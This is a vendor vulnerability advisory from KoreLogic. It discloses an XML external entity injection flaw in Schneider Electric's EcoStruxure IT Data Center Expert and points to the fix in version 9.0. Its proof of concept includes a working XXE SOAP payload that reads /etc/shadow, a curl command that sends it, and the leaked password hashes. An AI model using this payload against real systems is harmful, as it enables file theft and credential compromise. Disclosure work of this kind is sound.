Schneider Electric EcoStruxure IT Data Center Expert XML External Entities Injection

Vulnerability Description

The DataExchange route allows the XML body of SOAP requests to contain references to external entities. This allows an unauthenticated attacker to read local files, perform server-side request forgery, and overwhelm the web server resources.

Technical Description

From an authenticated perspective a user can send SOAP requests to the /DataExchange/DataExchangeService web route, providing an XML document in the POST body. When the web application processes the XML it will insecurely resolve entities that reference external resources, such as local files.

The GetHistoryRequest SOAP action can be utilized to exfiltrate the resolved value by placing the entity reference within the XML document’s Id parameter. The resulting error message reflects the value of the resolved entity, such as contents of a local file.

Mitigation and Remediation Recommendation

Version 9.0 of EcoStruxure IT Data Center Expert includes fixes for these vulnerabilities and is available upon request from Schneider Electric’s Customer Care Center. Refer to https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-189-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-189-01.pdf.

Credit

This vulnerability was discovered by Jaggar Henry and Jim Becher of KoreLogic, Inc.

Proof of Concept

    [attacker@box]$ cat payload
    <?xml version="1.0"?>
    <!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/shadow'>]>
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="http://www.schneider-electric.com/common/dataexchange/2011/05">
  <soapenv:Header/>
  <soapenv:Body>
     <ns:GetHistoryRequest>
        <ns:GetHistoryParameter>
           <ns:Id>&test;</ns:Id>
        </ns:GetHistoryParameter>
        <ns:GetHistoryFilter>
        </ns:GetHistoryFilter>
     </ns:GetHistoryRequest>
  </soapenv:Body>
    </soapenv:Envelope>

    [attacker@box]$ curl --digest --user kore:logic                                  \
                    -k https://dce.example.com/DataExchange/DataExchangeService \
                    -H 'Content-Type: text/xml' --data @payload

    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soap:Body><soap:Fault><faultcode>soap:Client</faultcode><faultstring>Invalid Id</faultstring><detail><Fault_Invalid_Id xmlns="http://www.schneider-electric.com/common/dataexchange/2011/05/DataExchangeInterface/Fault">root:$6$nAQ9/nHfzNJH2Q28$t0.KyJ810alBDwz3NGyEWNGWzQgXdrsUooT1UbXKz9SfpkHLaZngVY6oA8TVCYnCqP2boorvDsmufXawpy1T41:20021:0:99999:7:::
    bin:*:19767:0:99999:7:::
    daemon:*:19767:0:99999:7:::
    adm:*:19767:0:99999:7:::
    lp:*:19767:0:99999:7:::
    mail:*:19767:0:99999:7:::
    ...

The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy